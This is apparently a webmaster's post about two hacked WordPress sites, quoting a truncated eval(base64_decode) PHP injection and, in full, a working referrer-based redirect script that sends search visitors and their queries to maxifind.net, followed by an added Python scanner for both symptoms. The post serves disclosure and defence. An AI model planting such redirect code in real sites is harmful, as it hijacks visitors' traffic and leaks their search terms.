Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.
1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.
On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run its hack all the way through. My guess is it's probably some kind of redirect.
2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.
The only way I found out about it was my AVG detected an Exploit Search Engine Hijack when I navigated to the site, and when I viewed the rendered source code I found this script:
<script>
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length).split("&");
</script>
We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!
I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.
So be sure to keep your WP installs up-to-date and also have a good WordPress backup and restore process in place.
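
An added example, not part of the original post: a small Python check for the two symptoms described above, an eval(base64_decode( call near the top of PHP files and a rendered-page script that reads document.referrer and then sets window.location. The function names, the 2048-byte head window and the sample files are assumptions made for the demonstration; a hit is a lead for manual review, not proof of infection.

```python
import re
import tempfile
from pathlib import Path

HEAD_BYTES = 2048  # assumption: the injection described sits at the top of each file
EVAL_B64 = re.compile(rb"eval\s*\(\s*(?:gz\w+\s*\(\s*)?base64_decode\s*\(", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LOCATION_SET = re.compile(r"\blocation(?:\.href)?\s*=(?!=)")  # assignment, not ==


def scan_php_tree(root):
    """Relative paths of .php files whose first HEAD_BYTES contain eval(base64_decode(."""
    root = Path(root)
    hits = []
    for path in root.rglob("*.php"):
        if not path.is_file():
            continue
        with path.open("rb") as fh:
            head = fh.read(HEAD_BYTES)
        if EVAL_B64.search(head):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def referrer_redirects(html):
    """Inline scripts that read document.referrer and also assign location."""
    return [body.strip() for body in SCRIPT_BLOCK.findall(html)
            if "document.referrer" in body and LOCATION_SET.search(body)]


def demo():
    """Run both checks on constructed samples (not real site data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-includes").mkdir()
        # Constructed infected file: placeholder payload 'QUJD' prepended to the file.
        (root / "index.php").write_text(
            "<?php eval(base64_decode('QUJD')); ?>\n<?php require 'wp-blog-header.php';\n")
        (root / "wp-includes" / "clean.php").write_text("<?php\nfunction hello() { return 'hi'; }\n")
        infected = scan_php_tree(root)
    # Constructed rendered page: one harmless script, one referrer-based redirect.
    page = ('<html><script>var x=1;</script>'
            '<script>var r=document.referrer; if(r.indexOf("google.")!=-1) '
            'window.location="http://redirect.example/?q="+r;</script></html>')
    return infected, referrer_redirects(page)


if __name__ == "__main__":
    print(demo())
```

Point scan_php_tree at a copy of the site's files, and feed referrer_redirects the saved "view source" of a page rather than the PHP, since the second injection was only visible in the rendered output.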